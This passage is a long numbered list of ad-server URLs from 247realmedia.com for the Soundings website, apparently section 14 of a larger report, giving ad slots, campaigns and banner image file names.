14.380. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1804055224@Top,Middle,Right,Right1,x01,x02,x03,x04

14.381. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1807334164@Top,Middle,Right,Right1,x01,x02,x03,x04

14.382. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1828813500@Top,Middle,Right,Right1,x01,x02,x03,x04

14.383. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1829726854@Top,Middle,Right,Right1,x01,x02,x03,x04

14.384. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1829762158@Top,Middle,Right,Right1,x01,x02,x03,x04

14.385. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1833270613@Top,Middle,Right,Right1,x01,x02,x03,x04

14.386. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1850925027@Top,Middle,Right,Right1,x01,x02,x03,x04

14.387. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1858082296@Top,Middle,Right,Right1,x01,x02,x03,x04

14.388. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1864556706@Top,Middle,Right,Right1,x01,x02,x03,x04

14.389. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1867138594@Top,Middle,Right,Right1,x01,x02,x03,x04

14.390. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1883135457@Top,Middle,Right,Right1,x01,x02,x03,x04

14.391. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1884033313@Top,Middle,Right,Right1,x01,x02,x03,x04

14.392. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1886073438@Top,Middle,Right,Right1,x01,x02,x03,x04

14.393. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1897549465@Top,Middle,Right,Right1,x01,x02,x03,x04

14.394. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1913132077@Top,Middle,Right,Right1,x01,x02,x03,x04

14.395. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1921485874@Top,Middle,Right,Right1,x01,x02,x03,x04

14.396. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1928213543@Top,Middle,Right,Right1,x01,x02,x03,x04

14.397. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1931333150@Top,Middle,Right,Right1,x01,x02,x03,x04

14.398. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1945288333@Top,Middle,Right,Right1,x01,x02,x03,x04

14.399. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1957359167@Top,Middle,Right,Right1,x01,x02,x03,x04

14.400. http://oasc05139.247realmedia.com/RealMedia/ads/adstream_mjx.ads/www.soundingsonline.com/index.php/1972042870@Top,Middle,Right,Right1,x01,x02,x03,x04

14.401. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/1088322501/Left1/default/empty.gif/7263485738303033424c73414270536c

14.402. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/1095051603/x05/default/empty.gif/7263485738303033424c73414270536c

14.403. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/1119361965/Bottom3/default/empty.gif/7263485738303033424c73414270536c

14.404. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/1146012391/Right1/default/empty.gif/7263485738303033424c73414270536c

14.405. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/1223143878/x02/default/empty.gif/7263485738303033424c73414270536c

14.406. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/13627994/Left/default/empty.gif/7263485738303033424c73414270536c

14.407. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/1384536630/Top/default/empty.gif/7263485738303033424c73414270536c

14.408. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/1408846600/Middle/default/empty.gif/7263485738303033424c73414270536c

14.409. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/1606215913/BottomRight/default/empty.gif/7263485738303033424c73414270536c

14.410. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/1812286391/x04/default/empty.gif/7263485738303033424c73414270536c

14.411. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/2062153072/x01/default/empty.gif/7263485738303033424c73414270536c

14.412. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/2117805232/Left2/default/empty.gif/7263485738303033424c73414270536c

14.413. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/258558596/Bottom2/default/empty.gif/7263485738303033424c73414270536c

14.414. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/327792408/Bottom1/default/empty.gif/7263485738303033424c73414270536c

14.415. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/402494553/Left3/default/empty.gif/7263485738303033424c73414270536c

14.416. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/54249257/x03/default/empty.gif/7263485738303033424c73414270536c

14.417. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/542573873/Bottom/default/empty.gif/7263485738303033424c73414270536c

14.418. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/NaN/701883874/Right2/default/empty.gif/7263485738303033424c73414270536c

14.419. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1006747487/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

14.420. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1018021269/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279

14.421. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1036877118/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

14.422. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1064540646/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

14.423. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1074790821/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

14.424. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/107755770/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

14.425. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1078006695/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

14.426. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1099776824/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

14.427. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1108735125/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

14.428. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/111286636/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

14.429. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1126236382/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

14.430. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/112793374/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

14.431. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1159061525/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

14.432. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1174768862/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

14.433. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1187342870/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

14.434. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1203869454/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

14.435. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1212301165/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/7263485738303033424c73414270536c

14.436. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1263431205/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

14.437. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1287458599/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

14.438. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1304908327/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/7263485738303033424c73414270536c

14.439. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1324381451/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

14.440. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1398468739/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279

14.441. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1399245462/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

14.442. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1415426878/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

14.443. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1431245089/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

14.444. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1436265523/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

14.445. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1446678663/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

14.446. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1486045072/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

14.447. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1500213411/x03/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

14.448. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1506780268/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

14.449. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/156346633/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

14.450. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1567263834/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/7263485738303033424c73414270536c

14.451. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1591422292/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

14.452. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1593051790/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279

14.453. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1609584897/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

14.454. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1652734120/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

14.455. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1656197317/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

14.456. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1685265758/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

14.457. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1686621276/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

14.458. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1697505280/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

14.459. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1698039722/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

14.460. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1706501308/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

14.461. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1708168447/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/7263485738303033424c73414270536c

14.462. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1710223704/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

14.463. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1725875891/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

14.464. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/181770509/Right1/Dom_Ent/House-Sound-Btn/snd_cc_300x100120109.jpg/726348573830302b4e47344144525279

14.465. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1839652180/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

14.466. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1897798837/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

14.467. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/19190715/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

14.468. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1921995207/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

14.469. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1925968507/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

14.470. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/19316522/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

14.471. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1972223152/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

14.472. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1989764170/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

14.473. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1990120906/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

14.474. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1992827791/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

14.475. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2000460958/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

14.476. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2039360394/Right/Dom_Ent/House-Sound-Rect-300x250/Soundings_subscribead_300x250.jpg/726348573830302b4e47344144525279

14.477. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2101192040/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

14.478. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2102258488/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

14.479. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2105583430/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

14.480. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2110013632/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/7263485738303033424c73414270536c

14.481. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/2139721205/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

14.482. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/222638617/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

14.483. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/230260175/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

14.484. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/249777070/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/7263485738303033424c73414270536c

14.485. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/281847158/x02/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

14.486. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/285317148/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

14.487. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/287333455/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279

14.488. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/301024327/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

14.489. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/312414512/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

14.490. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/312913212/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

14.491. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/338106476/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

14.492. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/37601243/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

14.493. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/386017114/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

14.494. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/396828855/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

14.495. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/399157577/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

14.496. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/404785047/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

14.497. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/440360851/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

14.498. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/445245444/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

14.499. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/488972836/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

14.500. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/495614817/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

14.501. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/506110015/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

14.502. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/522788815/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

14.503. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/52813720/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

14.504. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/560089787/x04/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

14.505. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/601575059/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

14.506. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/613368033/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

14.507. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/649757406/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

14.508. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/66254069/x03/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

14.509. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/662641130/Right1/Dom_Ent/House-Sound-Btn/wf_de_ad_300x100.jpg/726348573830302b4e47344144525279

14.510. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/676472739/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

14.511. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/706664927/x04/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

14.512. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/762543895/x03/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

14.513. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/783502762/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

14.514. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/810025955/x02/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

14.515. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/844694778/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

14.516. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/861795507/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

14.517. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/870635499/x03/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

14.518. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/879719656/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

14.519. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/888728536/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

14.520. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/897548153/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

